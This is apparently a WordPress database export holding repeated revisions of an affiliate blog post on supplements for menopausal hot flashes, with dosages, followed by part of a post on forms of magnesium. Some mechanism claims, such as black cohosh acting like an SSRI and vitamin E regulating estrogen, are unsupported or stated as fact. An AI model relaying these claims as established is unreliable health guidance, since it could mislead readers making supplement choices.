GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 12:30:01','2023-09-19 12:30:01','',5506,'https://tummyrevolution.com/?p=5617',0,'revision','',0),(5616,3,'2023-09-19 12:22:08','2023-09-19 12:22:08','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\"\"\n\n\n\n
\"\"/
\n\n\n\n\n\n\n

\"\"

\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works:

\n\n\n\n

1.Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

\n\n\n\n

Dosage:

\n\n\n\n

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n\"\"\n\n\n\n

\"\"VitaminVitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works:

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n\n

How it works:

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 12:22:08','2023-09-19 12:22:08','',5506,'https://tummyrevolution.com/?p=5616',0,'revision','',0),(5621,3,'2023-09-19 13:30:04','2023-09-19 13:30:04','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\n\n\n

\"\"

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n

\"\"

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

Recommended Product

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 13:30:04','2023-09-19 13:30:04','',5506,'https://tummyrevolution.com/?p=5621',0,'revision','',0),(5618,3,'2023-09-19 12:47:05','2023-09-19 12:47:05','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\n\n\n

\"\"

\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n

\"\"

\n

 

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

\n\n\n\n

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n

\"\"

\n

 

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

Recommended Product

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 12:47:05','2023-09-19 12:47:05','',5506,'https://tummyrevolution.com/?p=5618',0,'revision','',0),(5619,3,'2023-09-19 12:48:38','2023-09-19 12:48:38','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\n\n\n

\"\"

\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n

\"\"

\n

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

\n\n\n\n

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

Recommended Product

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 12:48:38','2023-09-19 12:48:38','',5506,'https://tummyrevolution.com/?p=5619',0,'revision','',0),(5620,3,'2023-09-19 13:26:35','2023-09-19 13:26:35','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\n\n\n

\"\"

\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n

\"\"

\n

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

\n\n\n\n

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

Recommended Product

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 13:26:35','2023-09-19 13:26:35','',5506,'https://tummyrevolution.com/?p=5620',0,'revision','',0),(5622,3,'2023-09-19 13:34:33','2023-09-19 13:34:33','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n\n\n\n

\"\"

\n\n\n

\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

Recommended Product

\n\n\n\n

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 13:34:33','2023-09-19 13:34:33','',5506,'https://tummyrevolution.com/?p=5622',0,'revision','',0),(5623,3,'2023-09-19 13:37:48','2023-09-19 13:37:48','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n\n\n\n\n

\"\"

\n\n\n

\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"

\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 13:37:48','2023-09-19 13:37:48','',5506,'https://tummyrevolution.com/?p=5623',0,'revision','',0),(5624,3,'2023-09-19 13:41:11','2023-09-19 13:41:11','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n\n\n\n\n

\"\"

\n\n\n

\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-19 13:41:11','2023-09-19 13:41:11','',5506,'https://tummyrevolution.com/?p=5624',0,'revision','',0),(5626,3,'2023-09-19 14:04:38','2023-09-19 14:04:38','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium
Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.
Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

LINK TO PRODUKT
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

LINK TO PRODUCT
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

